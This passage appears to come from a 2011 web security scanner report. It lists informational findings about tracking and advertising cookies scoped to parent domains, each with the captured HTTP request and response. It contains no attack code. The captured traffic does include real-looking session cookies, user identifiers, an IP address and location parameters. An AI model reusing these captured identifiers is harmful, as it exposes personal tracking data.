13.40. http://c.bing.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.bing.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 14:24:20 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; _HOP=; MUID=E361C23374E642C998D8ABA7166A75EC; OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c7f2206b9bd64464bac0097685f7b8444; _SS=SID=7E86734B014B497982A1A3998AE3B12B&CW=1065&CH=723; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Sat, 04-Feb-2012 14:24:20 GMT; path=/;
Date: Tue, 19 Jul 2011 14:24:20 GMT
Content-Length: 0

13.41. http://c.microsoft.com/trans_pixel.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.microsoft.com
Path:	/trans_pixel.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:58:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trans_pixel.asp?source=www&TYPE=PV&p=worldwide&URI=%2fworldwide%2fdefault.aspx&GUID=1F4FC18C-F71E-47FB-8FC9-612F8EE59C61&r=http%3a%2f%2fwww.microsoft.com%2fworldwide&lc=en-us HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/worldwide/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078488618:ss=1311077969178; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.NumberOfVisits=3&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:02&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=70&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=e2380e0986da4be1b66f0ac9e9764ae5; domain=.microsoft.com; expires=Tue, 19-Jul-2011 15:58:34 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Date: Tue, 19 Jul 2011 15:28:33 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

13.42. http://cdnt.meteorsolutions.com/api/setid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdnt.meteorsolutions.com
Path:	/api/setid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/setid?parent_fbid=&application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:16:53 GMT
Content-Type: image/gif
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a"
Content-Length: 43
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

GIF89a.............!.......,...........D..;

13.43. http://cdnt.meteorsolutions.com/api/track previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdnt.meteorsolutions.com
Path:	/api/track

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/
uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:16:53 GMT
Content-Type: application/javascript
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "0ab6932a09770d21174fc4740c4ea6797459b1b2"
Content-Length: 133
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:16:53 GMT; Path=/

meteor.json_query_callback({"parent_id": "", "id": "nSlUkQ8r7Lb", "uid": "0ad1f409\\x2Dc147\\x2D4bb9\\x2Da425\\x2D2684ee1031f7"}, 0);

13.44. http://clk.atdmt.com/goiframe/213439054/340524297/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/goiframe/213439054/340524297/direct/01

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ach00=ceda/2b295:66c2/2b7b2:8bff/2a019; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e:cb8d24e/2a019/144bfd09/8bff/4e25ecbb; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/213439054/340524297/direct/01 HTTP/1.1
Host: clk.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PVM/iview/340524297/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=
Cookie: AA002=1297100700-4279215; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; MUID=3957719BE8F34A5DA51D204E7E06704A; ach00=ceda/2b295:66c2/2b7b2; ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=ceda/2b295:66c2/2b7b2:8bff/2a019; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d61e38e/2b295/1397f116/ceda/4e1f7328:d550fc1/2b7b2/13ebac86/66c2/4e1f736e:cb8d24e/2a019/144bfd09/8bff/4e25ecbb; expires=Thursday, 18-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Tue, 19 Jul 2011 20:44:42 GMT
Connection: close

13.45. http://clk.specificclick.net/click/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.specificclick.net
Path:	/click/v=5

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ug=WPTUOuwXp9NyRD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 20:44:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=http://t.atdmt.com HTTP/1.1
Host: clk.specificclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PVM/iview/340524297/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=24555;c=159320;b=985192;ts=20110719164416;dct=
Cookie: ug=WPTUOuwXp9NyRD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Set-Cookie: ug=WPTUOuwXp9NyRD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 20:44:45 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://t.atdmt.com
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 168
Date: Tue, 19 Jul 2011 20:44:45 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://t.atdmt.com">here</a>.<p>
</body>
</html>

13.46. http://d.agkn.com/pixel!t=650! previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.agkn.com
Path:	/pixel!t=650!

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid=636735553077172289; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 17-Jul-2016 20:44:49 GMT; Path=/
u=6|0BAgVuKlBAAAgAAMBACcCAtPdRgLT2IYBAlB9AeUAAAAAA%2BwqwQAAAAACjaJKAAAAAA58t90BagIABDCfAAQwtAA%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 18-Jul-2013 20:44:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel!t=650!?ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&che=8001782&uuid=2473514405220909223&camid=5645623&plaid=65809089&creid=42836554&adgid=243054557 HTTP/1.1
Host: d.agkn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid=636735553077172289; u=6|0BAgVsetHAAAQAAEBACcCAtPdQQLT2IEBAlB9AeUAAAAAA%2BwqvwAAAAACj9l3AAAAAA58t6QBagIABDCfAAQwtAA%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=636735553077172289; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 17-Jul-2016 20:44:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BAgVuKlBAAAgAAMBACcCAtPdRgLT2IYBAlB9AeUAAAAAA%2BwqwQAAAAACjaJKAAAAAA58t90BagIABDCfAAQwtAA%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 18-Jul-2013 20:44:49 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"43-1308732886000"
Last-Modified: Wed, 22 Jun 2011 08:54:46 GMT
Content-Type: image/gif
Content-Language: en-US
Content-Length: 43
Date: Tue, 19 Jul 2011 20:44:49 GMT
Connection: close

GIF89a.............!.......,...........D..;

13.47. http://ehg-aaa.hitbox.com/HG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ehg-aaa.hitbox.com
Path:	/HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WSS_GW=V1z%X%%%rBB@^; path=/; domain=.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
CTG=1311102280; path=/; domain=.hitbox.com; expires=Tue, 26-Jul-2011 19:04:40 GMT; max-age=604800

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM550120M4ND07EN3&cd=1&hv=6&n=/home.aspx&con=&vcon=/en-nne/Pages&tt=auto&ja=y&dt=14&zo=300&lm=1311102271000&bn=Netscape&ce=y&ss=1920*1200&sc=24&sv=13&cy=u&hp=u&ln=en-US&vpc=HBX0140s&vjs=HBX0150.01s&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&lv.id=&lv.pos=&ttt=lid,lpos&ra=&rf=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pl=Mozilla%20Default%20Plug-in%3AJava%28TM%29%20Platform%20SE%206%20U26%3AJava%20Deployment%20Toolkit%206.0.260.3%3AWPI%20Detector%201.3%3A&hid=0.7788128023153735 HTTP/1.1
Host: ehg-aaa.hitbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com
Cookie: CTG=1310995053; WSS_GW=V1z%X%r^^QrCr

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:40 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%%%rBB@^; path=/; domain=.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
Set-Cookie: CTG=1311102280; path=/; domain=.hitbox.com; expires=Tue, 26-Jul-2011 19:04:40 GMT; max-age=604800
Set-Cookie: DM550120M4NDV6=V1r@(#X"rz%X%%%rBB@^eer%@ez%zrz%"%X%%%rBB@^z%X%%%rBB@^"%X%%%rBBir"%X%%%rBB@^eer%@e"%z(xB$aTxB[TTaxB$YIWaFxB$O:maxB(IFGKz7}z)OuKr6%rrzA6aT"TTa6YIWaF6O:ma|IFGK; path=/; domain=ehg-aaa.hitbox.com; expires=Wed, 18-Jul-2012 19:04:40 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 19 Jul 2011 19:04:41 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

13.48. http://g-pixel.invitemedia.com/gmatcher previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://g-pixel.invitemedia.com
Path:	/gmatcher

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; Domain=invitemedia.com; expires=Wed, 18-Jul-2012 14:28:38 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gmatcher?id=CAESEBL6QfFdOZBFuwKtr4mXcyc&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMwM119; dp_rec="{\"1\": 1308705141+ \"3\": 1308705126+ \"2\": 1308705121+ \"4\": 1305981633}"; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"318445\": [1310644253+ \"Th7YGwAJYV4K7GUs0lMuuA==\"+ 129398+ 75015+ 1685]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"609953\": [1310644252+ \"Th7YGgAJ5ZgK7GTR1UIraQ==\"+ 129395+ 75015+ 1685]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"678237\": [1309235299+ \"6199351355498244314\"+ 4483+ 2534+ 2]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"690770\": [1309951300+ \"ThRFQQAEG8YK5TlPHdsIpA==\"+ 63083+ 25140+ 6119]+ \"584205\": [1309235459+ \"4153838206207653460\"+ 160819+ 103586+ 2]+ \"642979\": [1309224535+ \"2550584914158478617\"+ 162013+ 105345+ 2]+ \"609770\": [1308705126+ \"4234390b-dad8-3097-8291-83ad77634b5c\"+ 135488+ 76161+ 55]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuFY/59JgFFi7obfH1gUGDVObgLSBowWYD6XDMftqyxA2TlQ2RNQWTCfS4Tj/mI2ASaJI10XgbIMGgwGDBYMQNGJy1iBepo3LUURfTuRTYBD4vEGVNFZM9iAapvWoorOfQwy4fqdJSiiK+aDRL81taKIrgG6n0niGZpo7wKQuS1nn75HFn09ESR68OF1FNHJ70HmXmjYjCL6eyFIdC6a6N2XoPCY8aEBRXQn0GVZEp/eI4uKcsz8wSLQyiyx6DSq8K6vLAITGSXOLf//Dll4FtCMa4wSV17+e4ds9NkXrALMEvue3kMR/fgK7LhdF1BEZ20Eid76fhAhCgCI44aO"; io_freq_p1="eJzjEuf4YSPAIjF3w+8PLAoMGgwGTBZzQGwuYY6DCQJMEke6LkIlGCwYgIJ9YQKMEs2blqIILokX4JR4vAFV8GU8UGXTWlTBOxFAwet3liAJinBsCxU4yCTxrakVRemyBKDSlrNP3yMLPo4BCl5o2IwieCEUKDgXTfBpAFBwxoeG98g2/QgUaGWWWHQaVfRWoMBERolzy/+/QzZgc4wAs8S+p/dQBI+C7J+76wKKYHc4UPDW94MIQQCXP1h1"; segments_p1="eJwtUk1LAlEUJWcWr1nNT+kH9BPaF7Rr16J+QxpCSRJYLbIvJosgyvyCPqSgEs2GSqiotIwgCyOpMWgCTbvn0OZw5tz7zj3vvjF05aQ1Q1czSeDZj0ew3OwQfN2F8lKEEqoAa88eQ1Obw0ansgbMte2Yo4tq80xOaoZqT+rm5eF0HXowh+5Wr9AUTbK0XW6Cz9fAE/vgC1RWvRiXdT3iHhkw9/7d3xso3vHo+JgmjnklkMN3/RxH1i+Aty76TnmLk2fwfBDzvX0SKxPXzKgVdnURYsO4zws6zoLA8BS88jxjV8GdT+BBg8jbLTrgqTa4jzPuOW+W1e8ElLcG5rV7JP9jv7ngyzL/RAWq1S30mCZ3BTTbHF2gSYzbudpC1WYM6wZY5dVL7FlhmEwAZ91f8Ai3NtrqEPvXIaE7UchPJcjXCfBFbuaEeUfbyBFXiJREcYTyh6zQUCW/bj40/Qyc4qS4wwQHwEqS70M9lAZ+8UeY68Irc5NBmtWWIEdMoRvsLroQAoNCAxy6VQCGj/COLWQpj2t/J9q2Gw=="; 